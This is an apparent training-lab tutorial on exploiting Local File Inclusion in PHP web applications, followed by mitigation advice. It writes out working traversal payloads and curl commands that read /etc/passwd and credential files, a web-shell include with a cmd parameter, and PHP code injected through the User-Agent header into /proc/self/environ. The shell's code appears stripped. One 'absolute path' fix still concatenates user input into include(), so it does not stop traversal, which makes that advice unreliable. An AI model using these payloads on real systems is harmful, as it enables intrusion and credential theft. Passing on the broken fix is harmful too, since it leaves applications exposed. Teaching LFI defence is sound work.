Objective: Learn how to exploit Local File Inclusion (LFI) vulnerabilities in PHP web applications to access sensitive files, execute malicious code, and understand how to secure applications against such attacks.
Scenario: LFI vulnerabilities occur when a web application dynamically includes files based on user input without proper validation. This can allow attackers to access sensitive files or execute arbitrary code. Your task is to identify LFI vulnerabilities, exploit them, and implement mitigation techniques.
Lab Setup
- Environment:
- A PHP-based web application with an LFI vulnerability.
- Tools like
curlor a web browser for testing. - Access to a vulnerable server or a local setup (e.g., XAMPP or Docker).
- Example Vulnerable URL:
http://<target_ip>/vulnerable.php?page=home
Lab Steps
Step 1: Identify the LFI Vulnerability
- Test the application by manipulating the
pageparameter:http://<target_ip>/vulnerable.php?page=../../etc/passwd - Use
curlto automate requests:curl "http://<target_ip>/vulnerable.php?page=../../etc/passwd" - If successful, the server will return the contents of
/etc/passwd.- Example output:
root:x:0:0:root:/root:/bin/bash user:x:1000:1000::/home/user:/bin/bash
- Example output:
Step 2: Access Sensitive Files
- Try accessing application configuration files to extract sensitive information:
- Common targets:
/etc/passwd(Linux user accounts)/var/www/html/config.php(application credentials)
- Example request:
http://<target_ip>/vulnerable.php?page=../../var/www/html/config.php - Look for database credentials or API keys in the output.
- Common targets:
Step 3: Exploit LFI for Code Execution
- If the application allows file uploads, upload a PHP web shell (e.g.,
shell.php):<?php ?> - Use LFI to include the uploaded file:
http://<target_ip>/vulnerable.php?page=uploads/shell.php&cmd=id - Verify command execution through the output (e.g., user ID, current directory).
- Alternatively, exploit
/proc/self/environto execute code:- Inject PHP code into the
User-Agentheader:curl -H "User-Agent: <?php system('id'); ?>" "http://<target_ip>/vulnerable.php?page=../../proc/self/environ" - If successful, the server will execute the injected code.
- Inject PHP code into the
Solution
Explanation:
- LFI vulnerabilities allow attackers to include files from the local file system.
- Attackers can use LFI to access sensitive files, execute malicious code, or escalate privileges.
Prevention:
- Validate and Sanitize User Inputs:
- Restrict input to allowed values using a whitelist:
$allowed_pages = ['home', 'about', 'contact']; if (in_array($_GET['page'], $allowed_pages)) { include($_GET['page'] . '.php'); } else { echo "Invalid page."; }
- Restrict input to allowed values using a whitelist:
- Use Absolute Paths:
- Avoid including files based on user input. Use predefined paths instead:
include('/var/www/html/pages/' . $page . '.php');
- Avoid including files based on user input. Use predefined paths instead:
- Disable Dangerous Functions:
- Restrict functions like
include,require, andfile_get_contents.
- Restrict functions like
- Harden Server Configurations:
- Disable file uploads if not needed.
- Use proper permissions to restrict access to sensitive files.
- Monitor Logs:
- Monitor server logs for unusual file access patterns or error messages.
Testing and Verification
- Re-test vulnerable URLs after implementing mitigations to ensure the vulnerability is resolved.
- Attempt to access sensitive files or execute code to confirm the application is secure.
- Document all findings and changes for future reference.
Reflection
This exercise highlights the risks posed by LFI vulnerabilities in PHP applications and demonstrates how to exploit and secure them. By completing this lab, you’ve gained practical experience in identifying, exploiting, and mitigating LFI vulnerabilities to improve web application security.
0 Comments